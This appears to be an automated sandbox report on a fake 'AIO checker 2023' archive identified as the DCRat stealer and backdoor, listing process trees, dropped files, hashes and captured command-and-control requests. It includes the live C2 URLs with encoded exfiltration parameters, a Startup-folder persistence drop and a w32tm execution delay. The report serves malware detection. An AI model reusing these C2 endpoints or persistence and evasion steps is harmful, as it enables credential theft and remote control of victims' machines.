File name:

Telegram Desktop.zip

Full analysis: https://app.any.run/tasks/6af9818a-7b8b-4654-8439-10c6fb309e11
Verdict: Malicious activity
Threats:

A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices.

Malware Trends Tracker     >>>
Analysis date: March 08, 2024, 20:13:30
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
stealer
rat
backdoor
dcrat
remote
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

311F8E33DE278E9A2A3A09086CB444E1

SHA1:

7D1006C3D39D868DE2540BE2E888CE4C4C35A6D3

SHA256:

D86296CBA8A3752B0D794CE152830A544EC7CD7B64DBCDF2ACA73481CEC59DE9

SSDEEP:

98304:d/jRLcZisO7KOFogtb4Kfcsoc6BfjJRSZWPNqQWnGV6ZaSZNkHKaVANJxZ6K9R3w:LFwHSPgOCQMnR6G7oK3u40zy

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • WinRAR.exe (PID: 3288)
      • AIO checker 2023.exe (PID: 3948)
      • ms_update.exe (PID: 3428)

    • Create files in the Startup directory

      • ms_update.exe (PID: 3428)

    • Actions looks like stealing of personal data

      • ms_updater.exe (PID: 2672)

    • Connects to the CnC server

      • ms_updater.exe (PID: 2672)

    • DCRAT has been detected (SURICATA)

      • ms_updater.exe (PID: 2672)

  • SUSPICIOUS

    • Process drops legitimate windows executable

      • WinRAR.exe (PID: 3784)

    • Executable content was dropped or overwritten

      • AIO checker 2023.exe (PID: 3948)
      • ms_update.exe (PID: 3428)

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 3784)
      • AIO checker 2023.exe (PID: 3948)
      • ms_updater.exe (PID: 2672)

    • Reads the Internet Settings

      • AIO checker 2023.exe (PID: 3948)
      • ms_updater.exe (PID: 2672)

    • Reads settings of System Certificates

      • ms_updater.exe (PID: 2672)

    • Executing commands from a ".bat" file

      • ms_updater.exe (PID: 2672)

    • Starts CMD.EXE for commands execution

      • ms_updater.exe (PID: 2672)

    • Probably delay the execution using 'w32tm.exe'

      • cmd.exe (PID: 2564)

  • INFO

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 3784)

    • Checks supported languages

      • AIO checker 2023.exe (PID: 3948)
      • ms_update.exe (PID: 3428)
      • ms_updater.exe (PID: 2672)

    • Drops the executable file immediately after the start

      • WinRAR.exe (PID: 3784)

    • Reads the computer name

      • AIO checker 2023.exe (PID: 3948)
      • ms_update.exe (PID: 3428)
      • ms_updater.exe (PID: 2672)

    • Creates files or folders in the user directory

      • AIO checker 2023.exe (PID: 3948)
      • ms_update.exe (PID: 3428)

    • Manual execution by a user

      • WinRAR.exe (PID: 3784)

    • Reads the machine GUID from the registry

      • ms_update.exe (PID: 3428)
      • ms_updater.exe (PID: 2672)

    • Reads Environment values

      • ms_updater.exe (PID: 2672)

    • Reads the software policy settings

      • ms_updater.exe (PID: 2672)

    • Create files in a temporary directory

      • ms_updater.exe (PID: 2672)

    • Reads product name

      • ms_updater.exe (PID: 2672)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2024:03:08 22:08:54
ZipCRC: 0xee9d007f
ZipCompressedSize: 2018010
ZipUncompressedSize: 2017354
ZipFileName: AIO checker 2023.rar
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
50
Monitored processes
8
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe no specs winrar.exe aio checker 2023.exe ms_update.exe ms_updater.exe no specs #DCRAT ms_updater.exe cmd.exe no specs w32tm.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2564C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\HfroAScfQF.bat" "C:\Windows\System32\cmd.exems_updater.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2672"C:\Users\admin\AppData\Roaming\ms_updater.exe" C:\Users\admin\AppData\Roaming\ms_updater.exe
AIO checker 2023.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
5.15.2.0
Modules
Images
c:\users\admin\appdata\roaming\ms_updater.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\acgenral.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
2900w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 C:\Windows\System32\w32tm.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Time Service Diagnostic Tool
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\w32tm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3288"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Telegram Desktop.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3428"C:\Users\admin\AppData\Roaming\ms_update.exe" C:\Users\admin\AppData\Roaming\ms_update.exe
AIO checker 2023.exe
User:
admin
Company:
Google 1989-2023
Integrity Level:
MEDIUM
Description:
MicrosoftWindows
Exit code:
0
Version:
15.6.13.6
Modules
Images
c:\users\admin\appdata\roaming\ms_update.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
3784"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\AIO checker 2023.rar"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3948"C:\Users\admin\AppData\Local\Temp\Rar$EXa3784.37364\AIO checker 2023.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa3784.37364\AIO checker 2023.exe
WinRAR.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\rar$exa3784.37364\aio checker 2023.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
4060"C:\Users\admin\AppData\Roaming\ms_updater.exe" C:\Users\admin\AppData\Roaming\ms_updater.exeAIO checker 2023.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Version:
5.15.2.0
Modules
Images
c:\users\admin\appdata\roaming\ms_updater.exe
c:\windows\system32\ntdll.dll
Total events
16 530
Read events
16 443
Write events
84
Delete events
3

Modification events

(PID) Process:(3288) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(3288) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(3288) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3288) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(3288) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(3288) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(PID) Process:(3288) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\Telegram Desktop.zip
(PID) Process:(3288) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3288) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3288) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
Executable files
7
Suspicious files
1
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
3784WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa3784.37364\DscCoreConfProv.dllexecutable
MD5:850FB0501D6ED3035CF6CAEC764428DF
SHA256:D3348083905C789CEF44A55CDA47EB1844B1C393C10FABC6BE9A26565B6D6607
3784WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa3784.37364\DscCore.dllexecutable
MD5:392A0DF275F04FF940215D4CAFDB257E
SHA256:C4084F617ED1DFDACA814CC9375A62D1FB466226F36AA53255C33B108725F29F
3784WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa3784.37364\AIO checker 2023.exeexecutable
MD5:EF1999D5B9E6552E39F691A3631469B6
SHA256:33489E9AA842320D1175C609EBE01A35645F0D945BAEFD4F4F345A966000EA4A
2672ms_updater.exeC:\Users\admin\AppData\Local\Temp\T8glikZ0oBtext
MD5:2C0701A49FC53BB2C5EDCEB82507F429
SHA256:280FC01B7BBAA616FE69A3E1DFA65D9D020B0A36A3081A6856403ED5DF1F7960
2672ms_updater.exeC:\Users\admin\AppData\Local\Temp\HfroAScfQF.battext
MD5:E772C0B3F1FF0B3404FF04A71715940F
SHA256:BF372C824A9DFE2466E7E1D3E0E5184E3B8988D1A368BF4464B9F6B2AFA86AE6
3948AIO checker 2023.exeC:\Users\admin\AppData\Roaming\ms_updater.exeexecutable
MD5:9195E6C24D5BC6FC15E3720D53021D60
SHA256:22120341BEA07E0830B02CFD910C64D653B102D5BBFCFF89675BB8AB3996A3CA
3428ms_update.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exeexecutable
MD5:1D4ED7311DEA909CC611A87C49BA3C0D
SHA256:05FFEBB5C07F918E31AD85B05118FAE2E8C556F07BCD473EF9047654B123E907
3288WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3288.36030\AIO checker 2023.rarcompressed
MD5:90A345AC93B006DEA131ACA168718391
SHA256:A47BA41E74559A9121C6687FED7BF6CB32EC4659557A1B7D8790D300926A064A
3784WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa3784.37364\README.txttext
MD5:229BFB07694F123E2CB4986F47100A62
SHA256:8DF26B1F550C80646F01D25B8AAFCABB1342BBB2BE1CD335CDB8D254BE8C4090
3784WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa3784.37364\drvstore.dllexecutable
MD5:EF4C4EA376D172D966AB31388B3B63B6
SHA256:FF07C7B6CA66200A20D28668E4E9B401936EAB7F9A4FBD9F90BBA3D49E19AD77
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
7
DNS requests
2
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2672
ms_updater.exe
GET
200
188.114.97.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?WC98cmuphmuTjuFs85EaTwBwU=KtA3LkY0CVKg01t4&7d2ec6fa11a45062f73c3371e90be2d7=d2bcd0f2865f35a89899afe230c1002a&e95b42d7b0485703d17241e76e2b8585=AM5gzYmdjMklTM3QGNjJjNkdzY1QjYjFTMjhzM5YTN4UGNxgTZ3ITZ&WC98cmuphmuTjuFs85EaTwBwU=KtA3LkY0CVKg01t4
unknown
text
2.07 Kb
unknown
2672
ms_updater.exe
GET
188.114.97.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?beuOKd1dOi43Vti=sdz65zu&oZXJeSdekjrv1PT=5BoJ&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyIjNyUjM&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nIiBDNxEDOwIDN5QmZiRjNkZDZ5QmM4QDOjVDZ0E2NkdzMyQWY5YGOxIiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W
unknown
unknown
2672
ms_updater.exe
GET
200
188.114.97.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?beuOKd1dOi43Vti=sdz65zu&oZXJeSdekjrv1PT=5BoJ&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyIjNyUjM&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nI0YGO5gjMmZGMjZjYyYmNmFTYhBTOkBjZkNzNhhjYyM2Y1MWMjdzM3IiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W
unknown
text
908 b
unknown
2672
ms_updater.exe
GET
200
188.114.97.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?beuOKd1dOi43Vti=sdz65zu&oZXJeSdekjrv1PT=5BoJ&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyIjNyUjM&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&a05939b54e910a520ed16f4659e1d224=0VfiIiOiIWY3MjM4YDNlhzNyYjYlNWYmBjYjRDO5QzYiNDOykTNiwiIyQjY5MWN5ITMxUGZiFmZhZWMmVmZmRmMhFWNxQzNlJzMmVWZ4AjZhJiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W
unknown
text
104 b
unknown
2672
ms_updater.exe
GET
200
188.114.97.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?beuOKd1dOi43Vti=sdz65zu&oZXJeSdekjrv1PT=5BoJ&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyIjNyUjM&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nI1IDN0E2NlJTZ5IzY5QDMxEDM4QGOkZWOwATMhVjZmBTM1QmZxkDO2IiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W&a05939b54e910a520ed16f4659e1d224=d1nIiojIiF2NzIDO2QTZ4cjM2IWZjFmZwI2Y0gTO0MmYzgjM5UjIsISNyQDNhdTZyUWOyMWO0ATMxADOkhDZmlDMwETY1YmZwETNkZWM5gjNiojIzMTZ3UDM1MzNyUmMlJTMmFjN4kDZlBTNyEmMxkTOlBjIsIiMhdjNiZ2NzAjYlhzNkRWN3YjYxYDNmBjMllzNhFDO5gzMkJmMxkTOiojIiRmY0cTYxkjN3E2MmBDZhFmYmFzNyQWZkBDOiVGNiJmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnRtNWdNpWT3lERJlnVyEmaWdUYqJUeUpkRrlkNJlHZ2JVbiBHZGZFRGtWSzlUaUl2bqlEdGJTWpZlMWpHbtl0cJN1Vp9maJxWNyI2bCNjY550Vh5kTYFWa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFTUpdXaJBHNyQmd1ITY1ZlRLdGNyQmd1ITY1ZFbJZTSTpFdG1GVWJUMSl2dplkWKl2TpRzVhRnUXFles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlUeNRUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlmYwhXbjxmSwwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVZ1Z0VilnVyI1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWTE5ENZpGT0c3QPRTRU1UdBRlTp9maJpWOHJWa3lWSGJ1aJZTSTVWeS5mYxkjMZl2dplEbONzYsh2aJZTSpJmdsJjWspkbJNXSpJGcGdFVnBzVZdWUuNWMaJTY1ZUbjdkSp9UarhEZw5UbJNXS51EMFpGT0ElaMNTRqxEMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIWY3MjM4YDNlhzNyYjYlNWYmBjYjRDO5QzYiNDOykTNiwiI0ETZ2kTOyEGZzczNkBzM1QmZ4ETOlNWMzgTMxAjNmdjNiVGMwUWYzIiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W
unknown
text
104 b
unknown
2672
ms_updater.exe
GET
200
188.114.97.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?beuOKd1dOi43Vti=sdz65zu&oZXJeSdekjrv1PT=5BoJ&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyIjNyUjM&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&60fcc970050c21131ef204c321f6004c=d1nI5oUeaVHbXJGa50WVjhnVZBjRHJ1dChVUjhHbiBXMHpFa4ZEW6pEWapnVGh1YwpXUp9maJ9mUYlVUKNETpRjMkZXNyEWdWxWS2k0QhBjRHV1aKNjYq5EWhVkSDxUaJl2Tpd2RkhmQWJGaKNjWsh3VaVlSDxUaJl2Tp1ESjdnRVJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTSDJlSKhlW6ZlVihmVHRGVKNETp10Mi5GbtN2aG12Ymh3VaBnSulFak1WS2kUajxmTYZFdGdlWw4EbJN3dHJWM102TpNWbihGeVJGaWdEZUp0QMlGMXlFbSNzY21EWaNHbtp1ZwcVW5RmMilnQzwkNN1WS2k0QhBjRHVFdGdlWw4EbJNXSTtkdsdkWxYURJNza6pERGVUSyZ1RkNnRXp1UoNUS1xWRJxWNXFWT1cEW5hXMiBnUXRmQClnT1MWeRJkQ5FGbShkYoZVbV9WQTpVd5cUY3lTbjpGbXRVavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiIWY3MjM4YDNlhzNyYjYlNWYmBjYjRDO5QzYiNDOykTNiwiIyQjY5MWN5ITMxUGZiFmZhZWMmVmZmRmMhFWNxQzNlJzMmVWZ4AjZhJiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W
unknown
text
104 b
unknown
2672
ms_updater.exe
GET
200
188.114.97.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?beuOKd1dOi43Vti=sdz65zu&oZXJeSdekjrv1PT=5BoJ&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyIjNyUjM&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nIlZDOkFTNiZGNwMTOlFjYkljM4IDNlFjN2UDMwUWOlVzYlZWOkFmYlJiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W
unknown
text
108 b
unknown
2672
ms_updater.exe
GET
200
188.114.97.3:80
http://355212cm.nyashnyash.top/nyashsupport.php?beuOKd1dOi43Vti=sdz65zu&oZXJeSdekjrv1PT=5BoJ&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyIjNyUjM&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nI1IDN0E2NlJTZ5IzY5QDMxEDM4QGOkZWOwATMhVjZmBTM1QmZxkDO2IiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W&a05939b54e910a520ed16f4659e1d224=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